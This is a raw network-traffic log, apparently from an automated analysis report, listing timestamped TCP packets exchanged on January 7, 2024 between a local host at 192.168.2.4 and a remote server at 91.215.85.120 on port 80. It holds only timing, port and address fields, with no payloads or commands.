                                                                                                                                                                    Jan 7, 2024 05:29:22.816219091 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.816617966 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.816701889 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.816750050 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.816855907 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.816977024 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.817131042 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.817174911 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.817202091 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.817240000 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.817262888 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.817365885 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.817457914 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.817496061 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.817548990 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.817584991 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.818305969 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.818387985 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.818444014 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.818486929 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.818510056 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.818546057 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.818588972 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.818672895 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.819509029 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.819520950 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.819667101 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.819780111 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.819823027 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.819899082 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.819942951 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.820003986 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.820091963 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.820235014 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.820269108 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.820280075 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.820314884 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.820403099 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.820477962 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.820574999 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.820621967 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.820651054 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.820693970 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.821737051 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.821810007 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.821822882 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.821866989 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.822326899 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.822365046 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.822418928 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.822510004 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.822525024 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.822567940 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.823084116 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.823127985 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.823163986 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.823252916 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.823270082 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.823306084 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.823774099 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.823822021 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.823869944 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.823911905 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.823947906 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.823990107 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.824047089 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.824134111 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.824177027 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.824188948 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.824223995 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.824238062 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.824676991 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.824779987 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.824822903 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.824872971 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.824909925 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.824986935 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.825047970 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.825150013 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.825196028 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.826025009 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.826075077 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.826107979 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.826180935 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.826241970 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.826308012 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.826308012 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.826345921 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.826386929 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.826428890 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.826493979 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.826539040 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.827318907 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.827361107 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.827430010 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.827517033 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.827574015 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.827610970 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.827688932 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.827864885 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.827908039 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.827985048 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.828027010 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.828064919 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.828763962 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.828944921 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.828998089 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.829018116 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.829055071 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.829112053 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.829292059 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.829359055 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.829401970 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.829467058 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.829509020 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.829545975 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.829782963 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.829906940 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.829948902 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.829978943 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.830018044 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.830041885 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.830141068 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.830199003 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.830240965 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.830297947 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.830338001 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.830390930 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.830755949 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.830883026 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.830926895 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.830995083 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.831032038 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.831063032 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.831134081 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.831295967 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.831336975 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.831347942 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.831386089 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.831410885 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.831484079 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.831523895 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.831537008 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.831660032 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.831762075 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.831815958 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.831842899 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.831881046 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.831928968 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.831995010 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.832086086 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.832159042 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.832308054 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.832371950 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.832400084 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.832662106 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.832703114 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.832715988 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.832788944 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.832870007 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.832909107 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.833251953 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.833297968 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.833323002 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.833450079 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.833537102 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.833574057 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.833693981 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.833734035 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.833816051 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.834316969 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.834398031 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:22.834449053 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.993853092 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:22.993911028 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.189332008 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.205311060 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.248270988 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.281949043 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.282006979 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.480376959 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.499102116 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.499175072 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.499229908 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.499236107 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.499308109 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.499344110 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.499351978 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.499393940 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.499433994 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.499489069 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.499582052 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.499623060 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.499783039 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.499840021 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.499882936 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.499962091 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.500037909 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.500077963 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.500159979 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.500211000 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.500251055 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.500293016 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.500353098 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.500394106 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.500447035 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.500504017 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.500544071 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.500570059 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.500686884 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.500729084 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.500787973 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.500915051 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.500952005 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.501033068 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.501177073 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.501214981 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.501255035 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.501269102 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.501302004 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.501696110 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.501781940 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.501822948 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.501946926 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.502011061 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.502063036 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.502068996 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.502140999 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.502190113 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.502218962 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.502324104 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.502372980 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.502437115 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.502522945 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.502562046 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.502609968 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.502685070 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.502727985 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.502751112 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.502837896 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.502877951 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.502917051 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.503001928 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.503047943 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.503072977 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.503174067 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.503216028 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.503252983 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.503357887 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.503396988 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.503468990 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.503598928 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.503639936 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.503660917 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.503808022 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.503854036 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.503920078 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.504019022 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.504059076 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.504097939 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.504169941 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.504209042 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.504339933 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.504426956 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.504462004 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.504542112 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.504636049 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.504674911 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.504717112 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.504853964 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.504888058 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.504921913 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.505003929 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.505038023 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.505103111 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.505208969 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.505244970 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.505333900 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.505466938 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.505507946 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.505522966 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.505593061 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.505678892 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.505707979 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.505795956 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.505840063 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.505939007 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.506051064 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.506095886 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.506150007 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.506273031 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.506310940 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.506346941 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.506421089 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.506459951 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.506529093 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.506599903 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.506639004 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:23.506725073 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:23.506778002 CET804973591.215.85.120192.168.2.4
